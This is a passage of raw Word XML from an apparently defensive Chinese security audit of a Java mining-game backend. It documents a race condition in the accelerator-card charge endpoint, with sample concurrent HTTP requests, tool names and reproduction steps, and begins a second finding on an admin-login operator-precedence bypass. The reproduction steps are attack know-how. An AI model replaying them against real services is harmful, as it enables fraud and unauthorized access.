        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>T2：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>setBalance(1-1=0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（覆盖 T1 写入，余额依然为 0），矿机 slotId=2 设为已充电</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>最终结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：余额为 0（扣减1次），但 slotId=1 和 slotId=2 均已充电</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入口：AcceleratorController.java</w:t>
              <w:br/>
              <w:t>// MoveToStorageForm 可控字段：</w:t>
              <w:br/>
              <w:t>//   Integer slotId;  ← 矿机坑位ID（攻击者可控，决定为哪个坑位充电）</w:t>
              <w:br/>
              <w:t>@PostMapping("/charge")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Void&gt; charge(@CurrentUserId Long userId,   // ← userId 从 Token 安全提取</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                @RequestBody MoveToStorageForm form) {  // ← slotId 攻击者可控</w:t>
              <w:br/>
              <w:t xml:space="preserve">    acceleratorService.charge(userId, form.getSlotId());  // ← 污点 slotId 传入 service</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service 竞态漏洞点：AcceleratorService.java</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void charge(Long userId, Integer slotId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    banCheckService.requireSystemRunning();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    banCheckService.requireNotBanned(userId);</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    UserAcceleratorCard accel = userAcceleratorCardRepository.findByUserId(userId)  // ← ① 无锁读取余额快照</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseGet(() -&gt; { ... });</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    if (accel.getBalance() == null || accel.getBalance() &lt; ACCEL_COST) {  // ← ② 检查余额（应用层，非原子）</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("加速卡不足");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    UserMiner miner = userMinerRepository.findByUserIdAndSlotId(userId, slotId)  // ← 用 userId+slotId 定位，无越权</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseThrow(() -&gt; new IllegalArgumentException("坑位无矿机"));</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    accel.setBalance(accel.getBalance() - ACCEL_COST);  // ← ③ 扣减（基于旧快照，并发时被覆盖）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userAcceleratorCardRepository.save(accel);           // ← last-write-wins，后提交者覆盖先提交者</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    miner.setIsCharged(1);                               // ← ④ 两个并发请求各自的 miner 均被充电 ← 漏洞点</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setChargedExpireTime(LocalDateTime.now().plusMinutes(getDurationMinutes()));</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    userMinerRepository.save(miner</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>);</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    minerService.recalcUserLevelAndHashRate(userId);</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攻击者需同时发送两个或多个请求（针对同一 userId 的不同 slotId）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>请求1（并发发送）：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/api/accelerator/charge HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;有效用户Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce1&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;有效签名1&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"slotId": 1}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>请求2（与请求1同时发送）：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/api/accelerator/charge HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;有效用户Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce2&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;有效签名2&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"slotId": 2}</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108"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>准备一个持有 1 张加速卡（balance=1，ACCEL_COST=1）的已登录账户，该账户在多个 slotId 上部署了矿机</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">使用多线程或异步 HTTP 工具（如 Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>aiohttp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>curl --parallel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">、Burp Suite Turbo Intruder 并发模式）同时发送 N 个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST /api/accelerator/charge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 请求，分别携带不同的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（如 1, 2, 3...）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">服务端并发事务均在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userAcceleratorCardRepository.findByUserId(userId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 处读到相同的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>balance=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 快照，各自通过余额检查</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">各线程分别完成对各自 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 矿机的充电写入（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>setIsCharged=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），最终 last-write-wins 导致余额仅扣减到 0，但多台矿机均已被标记为已充电并获得加速收益</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">验证：查询各 slotId 矿机状态均为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isCharged=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，而加速卡 balance 仅减少了 1（而非 N）</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：攻击者以 1 张加速卡的代价，为 N 台矿机同时获得充电加速效果，等效于免费复制了 N-1 张加速卡的价值。</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11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 xml:space="preserve">（需有效 Bearer Token 及通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignAuthTestFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 签名校验）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="114"/>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普通已登录用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，无需任何特权；攻击者只需拥有 ≥1 张加速卡并在多个坑位部署矿机</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; 📎 该 sink 另有 2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受影响调用链（3 条）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>AcceleratorController.java.charge → AcceleratorService.java.charge → AcceleratorService.java.getDurationMinutes → PowerConfigRepository.java.findFirstByOrderByIdAsc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>AcceleratorController.java.charge → AcceleratorService.java.charge → UserMinerRepository.java.findByUserIdAndSlotId</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="117"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>AcceleratorController.java.charge → AcceleratorService.java.charge → UserAcceleratorCardRepository.java.findByUserId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audit_m049_065_charge_ctrl-path1of4.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m049_071_charge_ctrl-path2of4.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m049_075_charge_ctrl-path3of4.md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：AdminLoginService.java#login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_7" w:id="7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞6：管理员登录状态检查运算符优先级缺陷导致停用账号可绕过认证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="118"/>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：Admin 登录状态检查逻辑缺陷（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 优先级高于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）导致 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status = null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 账号认证绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="119"/>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src/main/java/com/gameBack/mjservice/service/AdminLoginService.java:login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="120"/>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：认证绕过 / 业务逻辑缺陷</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="121"/>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2"/>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：未授权（需知晓目标账号的用户名与密码）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="123"/>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AdminLoginService.login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中对管理员账号状态的校验条件如下：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if (admin == null || admin.getStatus() != null &amp;&amp; admin.getStatus() != 1) return null;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Java 中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 运算符优先级高于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，上述表达式等价于：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if ((admin == null) || (admin.getStatus() != null &amp;&amp; admin.getStatus() != 1)) return null;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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admin.getStatus()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 时：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>admin == null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="125"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>admin.getStatus() != null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="126"/>
        </w:numPr>
